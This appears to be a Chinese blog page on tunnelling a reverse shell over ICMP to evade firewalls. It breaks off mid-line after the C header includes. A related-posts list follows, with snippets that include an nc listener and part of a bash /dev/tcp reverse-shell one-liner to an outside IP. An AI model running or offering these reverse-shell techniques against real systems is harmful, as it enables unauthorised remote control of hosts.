利用ICMP协议反弹shell
简述
网络管理员通常使用各种各样的防火墙,以拦截各类渗透测试动作,如某防火墙允许已知的机器流量在端口和服务(入口过滤),并拥有强大的出口访问控制列表的设置。然而很多时候,为了方便运维管理,在各种安全策略中,ICMP协议通常是不会过滤的,通俗点说就是不会禁PING。
ICMP(Internet Control Message Protocol)Internet控制报文协议,是TCP/IP协议簇的一个子协议,用于在IP主机、路由器之间传递控制消息。如果在目标主机建立一个shell的管道,通过ICMP数据部分来传输协议即可实现远控过程中所需的数据交互。
服务端代码
Windows服务端:
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <netinet/in.h>
#include <netinet/ip_icmp.h>
#include <netinet/ip.h>
#include <string.h>
#include <unistd.h>
#incl
利用ICMP协议反弹shell相关推荐
- c语言实现icmp协议ping命令,利用ICMP协议实现ping命令
一.实现原理 ping利用ICMP协议包来侦测另一个主机是否可达.Ping的原理是使用了类型码为8的ICMP回送请求包,收到请求的主机则用类型码为0的ICMP回应报文.如果应答包和请求包的标示号.序号 ...
- linux 下ssh端口反弹,利用ssh隧道反弹shell
说明 本文旨在分析rssh的源代码来学习利用ssh隧道来反弹shell.整个rssh只有1个347行的main文件,所以整体的逻辑结构也比较好分析.关于SSH端口转发的知识可以看实战SSH端口转发这篇 ...
- 利用ICMP协议,使用python原始套接字实现主机存活探测工具
一.课题概述. 一学期一次的课程设计终于开始了(停课两周,马上放寒假了,哈哈哈哈哈哈...)这次我们课程设计的科目是计算机协议,我们小组抽到的题目是利用ICMP模仿ping命令写一个主机存活探测的工具 ...
- 利用msf实现反弹shell与提权(细节过程秒懂)
环境 攻击机:Kali ip:192.168.50.183 靶机:Win7(x64) 两者在同一个C段!!!! 生成payload 首先我们生成一个payload文件,如果靶机是64位的建议生成64位 ...
- Windows下反弹shell的方法
1.powercat反弹shell powercat(https://github.com/besimorhino/powercat )为Powershell版的Netcat,实际上是一个powers ...
- 渗透测试常用反弹shell方法(如何渗透测试反弹shell?)-Linux篇(゚益゚メ) 渗透测试
文章目录 相关博客 反弹shell介绍 常用反弹方式 NetCat(NC)反弹 正向NC 反向NC Telnet反弹 正向shell 反向shell OpenSSL Curl 相关博客 Linux信息 ...
- python反弹shell_反弹shell的几种方式总结
假设本机地址10.10.10.11,监听端口443. 1.Bash环境下反弹TCP协议shell 首先在本地监听TCP协议443端口 nc -lvp 443 然后在靶机上执行如下命令: bash -i ...
- 各种反弹shell方式
1.Bash环境下反弹TCP协议shell 首先在本地监听TCP协议443端口 nc -lvp 443 然后在靶机上执行如下命令: 1 bash -i >& /dev/tcp/121.4 ...
- PING的原理以及ICMP协议
主要内容: 1.ping的原理以及工作过程 2.ICMP协议 3.ICMP的应用:ping,traceroute 1.ping的原理以及工作过程 ping的原理 ping 程序是用来探测主机到主机 ...
最新文章
- python中的装饰器有哪些-python中的装饰器
- C++ File IO
- squid ldap认证(AD)
- python PyQt5中文教程☞【第八节】PyQt5控件(II)
- SQL判断NULL的几种常见方式
- Java通过ftp上传文件
- python实现解释器_Python 解释器初探
- 解决oracle客户端乱码问题,如何解决oracle客户端中文乱码问题?-Oracle
- SQL Server中的零碎数据库还原
- Visual Studio开发工具(5):VS2010 精美壁纸,总有一款适合你!
- Waud.js – 使用HTML5降级处理的Web音频库
- 消息 15135,级别 16,状态 8,过程 sp_addextendedproperty,对象无效。不允许有扩展属性,或对象不存在。...
- PHP瓜分两个数组的相同元素和不同元素的两种方法
- Baxter 机器人仿真软件安装及演示
- 【操作系统】TCP流式传输、UDP数据报传输
- 查询课程数mysql_mysql_数据查询练习
- pygame战棋游戏制作之战棋光标设置上(三)
- 计算机电源负载能力差,电脑电源问题:电脑电源负载能力差的原因及解决方法...
- 实现登录和用户信息组件的按需展示
- 逆战无法修复服务器,逆战登录时的各种问题 这些问题该如何解决?